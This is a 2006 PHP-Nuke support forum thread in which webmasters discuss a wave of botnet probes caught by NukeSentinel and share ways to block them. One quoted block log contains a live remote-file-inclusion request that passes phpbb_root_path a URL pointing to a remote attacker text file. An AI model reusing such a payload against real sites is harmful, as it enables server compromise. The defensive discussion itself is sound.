Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
Author Message
leo51
Worker
Worker



Joined: Sep 09, 2004
Posts: 106
Location: Canada

PostPosted: Mon Nov 13, 2006 11:17 pm Reply with quote

I am trying to understand why someone continues to run these similar types of scripts on my site.

Today alone NukeSentinel 30 blocks from 30 different IPs and these must be proxies and look at the time range between 11:00 AM & 12noon there were no less than 20. The flag of the 30 IPs show Australia but a NeoTrace terminate the IPs in different US States.

The attempts increase today and that might be as a result of I blocking some ranges on Sunday evening.

This has been going on for more than four months at least there were about two blocks ever so often but whoever it is seems to have gotten bad.

QUESTION: What is the person trying to accomplish


Date & Time: 2006-11-13 09:54:54 CST GMT -0600
Blocked IP: 66.70.189.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Get String:

THanks
 
View user's profile Send private message Visit poster's website MSN Messenger
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6432

PostPosted: Mon Nov 13, 2006 11:25 pm Reply with quote

Don't waste your time trying to understand why attackers do so. This can be easily stopped by adding authentication on your modules/Forums/admin directory. If you search the forums here, you can find specific details for doing this, and it's an important protection that will provide excellent protection without setting off NukeSentinel.

_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
 
View user's profile Send private message
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

PostPosted: Tue Nov 14, 2006 6:57 am Reply with quote

See this here:
[ Only registered users can see links on this board! Get registered or login! ]

_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... 
View user's profile Send private message Visit poster's website
gregexp
The Mouse Is Extension Of Arm



Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

PostPosted: Tue Nov 14, 2006 7:45 pm Reply with quote

leo51 wrote:
I am trying to understand why someone continues to run these similar types of scripts on my site.



First I will approach this with an answer, someone is more then likley letting something such as a program do this, and that does not always register when it is blocked. When it does register it will try to make the same attack but with something different, ussually the ip.


leo51 wrote:

QUESTION: What is the person trying to accomplish?


Some would say Just to know they can, and others would say to be malicious, this is more of a personal feeling and judgement on your own.

This should be the question in which both kguske and montego have stated:

How can I stop this?

They have linked you to the correct resources and I recomend to follow the instructions provided.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Wed Nov 15, 2006 12:21 am Reply with quote

It is many bot net scripts. They are targetting all kinds of PHP injections and using an IRC script to control all of them. Hundreds.. thousands of machines are affected. And they keep searching using Google and other search engines.

Their current flaw seems to be the use of libwww-perl, but that may change.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
Digital-Overload
Hangin' Around



Joined: May 13, 2005
Posts: 26

PostPosted: Thu Nov 16, 2006 1:34 pm Reply with quote

I Just Got 69 Emails From Sentinel With The Same stuff Pretty Much, For the Last 3 Hours Alone... and Yes, I've been getting this and the admin user injection alot of the past 5 or 6 months, I had to remove Guestbooks and set harse Permissions to users to make sure im not getting any Spam links added to news and the forums, so far the bots can register all they want, but they get deleted when it asks for my approval...., now im getting some stupid script submitting news .. lol AHmed or some shiz like that, but yeah, i got this like 100 times in the last week, and 69 just now when i checked my email, and decided to come on here and see if anyone else got hit like me... guess so...

Date & Time: 2006-11-16 09:57:37 Pacific Standard Time GMT -0800
Blocked IP: 219.93.90.33 (which i have about 345 Different IPs in the htaccess already for this type of attack)
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.65
Query String:<SITE ROOT><A BUnch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Get String: <SITE ROOT> <A Bunch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Post String: <SITE ROOT> <BUNCH OF Sub Folders>/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 219.93.90.33
Remote Port: none
Request Method: GET
 
View user's profile Send private message
jakec
Site Admin



Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Thu Nov 16, 2006 1:46 pm Reply with quote

See this post about how to block this type of attack before it gets to Sentinel: [ Only registered users can see links on this board! Get registered or login! ]
 
View user's profile Send private message
64bitguy
The Mouse Is Extension Of Arm



Joined: Mar 06, 2004
Posts: 1164

PostPosted: Thu Nov 16, 2006 2:07 pm Reply with quote

I believe you are going to start seeing a lot more abuse out of Turkey.

My Personal position is to completely block the entire country either through NukeSentinel or via .htaccess or both, but that's just me. As their Government doesn't care about people hosting abusive malicous code, I don't care about giving them any access or allowing their referers.

.htaccess
Code:
RewriteCond %{HTTP_REFERER} gen\.tr [NC, OR]

RewriteCond %{HTTP_REFERER} com\.tr [NC, OR]
RewriteCond %{HTTP_REFERER} org\.tr [NC, OR]
RewriteCond %{HTTP_REFERER} net\.tr [NC]


You get the idea. There are probabaly easier ways to do this, but it works for me.

_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance. 
View user's profile Send private message
evaders99







PostPosted: Thu Nov 16, 2006 7:09 pm Reply with quote

You are seeing a lot of abuse from across the world. It is due to many of the botnet scripts with hundreds or thousands of compromised servers. Turkey seems to be the choice for the direct script kiddies, but these libwww-perl attacks are much more than that.
 
technocrat
Life Cycles Becoming CPU Cycles



Joined: Jul 07, 2005
Posts: 511

PostPosted: Fri Nov 17, 2006 10:50 am Reply with quote

Blocking turkey is not going to help much in this situation. The problem is that someone from one of the hacking teams wrote the perl script to exploit this hole. Then a script kiddie website wrote a long set of directions on every step of how to use this.

Then the biggest script kiddie site out there took those directions an updated them (including how to use proxies) and posted them on their forums. It EXPLODED after that. Now every script kiddie with even a small amount of knowledge and a few proxies ips can use this.

On the main Evo site sentinel blocks 200 a day. The most effective solution has been to use the .htaccess perl rewrite. It completely took it off the radar.

_________________
Nuke-Evolution
phpBB-Evolution / phpBB-Evolution Blog 
View user's profile Send private message
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam

PostPosted: Fri Nov 17, 2006 11:02 am Reply with quote

I was getting around 200 emails too, over a couple of hours each day.
 
View user's profile Send private message Send e-mail
64bitguy







PostPosted: Fri Nov 17, 2006 3:02 pm Reply with quote

I agree that Turkey isn't "alone" in this regard. Personally, I block quite a few countries simply because:

a) They have nothing to offer to my community of users.
b) They only want access for abusive purposes including these illegal attaccks

In either case, thank you IP2C and other tools that help in blocking access. I think my original point was there is more than one way to skin a cat (thank you Apache).

As a couple of thoughts:
1) I see the strengths in blocking libwww-perl; however, keep in mind that if you spend your time doing site diagnostics (as I do), this function can be extremely useful, especially when examining compliance and statistical information regarding your site. (If you ever block yourself when running a W3C Validator, this is why! Don't forget to remove the blocker when doing that kind of work).

2) One of the benefits to seeing an attack like this is the ability to take action regarding it. While seeking revenge is stupid, people need to remember that these kinds of malicious probes and intrusions are a violation of United States law; specifically, 18 US Code ยง 1030.

Please remember that under the law, the company hosting is just as guilty as the user, once that information has been identified in writing to the host.

In other words, when you see ANYONE hosting malicious scripts, you should notify the host, remind them of the law and also threaten punitive action of $10,000.00 per incident as is your right under the law.

Does this work? Darn right it does. I have reported domains after seeing extensive attacks. I do this by looking up the host info at http://dnsstuff.com and then forward off a copy of the abuse message with a nice little form letter that I have already prepared to the host of the abusive scripts. I know of at least 50 instances where my actions had domains shut-down. It may not solve the problem, but it does hurt the attackers pocket-book as illegal abuse voids a hosting agreement. Remember that the IC3 is there for you too. People often complain about the hassle, but they have teeth and don't mind using them. Stealing administration information and passwords is a serious crime. It should be treated as such.

I can only emphasize that people should simply not lay down when attacked, fight back where you can and block where you don't want to bother. Obviously, a host in Turkey could care less about the law, which is why I simply choose to block the country entirely, as well as many other countries that operate in a similar manner of Internet lawlessness.

Finally, (and I guess this goes without saying... but regardless) everyone should also be checking their sites to ensure software is adequately patched against the results of a successful attack.
 
leo51







PostPosted: Fri Nov 17, 2006 11:05 pm Reply with quote

OK, Thanks guys for all of the input. I now have a better understanding of what has being going on. And yes I was blocking these IP ranges but it started to be a nuisance and taking up too much of my time. Also, I was thinking that some-hater was again trying to let me reduce my numbers once I block so many countries and ranges.

About a year and a half ago, I had to block-out almost the whole of Europe and Florida and start giving individuals access once they send an email with their IP. One guy living in Europe and one in Florida (two friends) went on a rampage-posting drunk all over my forms, guestbook, request form, forums just about anywhere on the sites where it was possible to post. They just create a new users and came back; use proxies, the ripe network and dialup.

Anyway, it was good that I made this post it help me understand a whole lot about the situation.

Again, Many Thanks
 
evaders99







PostPosted: Sun Nov 19, 2006 8:34 pm Reply with quote

Yep definitely report them. Any site that can be secured will stop hundreds of attempts against other hosts. Mostly, these sites are compromised and the host may not even know it. So use domaintools or whatever you prefer, send an email to the technical contacts, and hope they do something
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©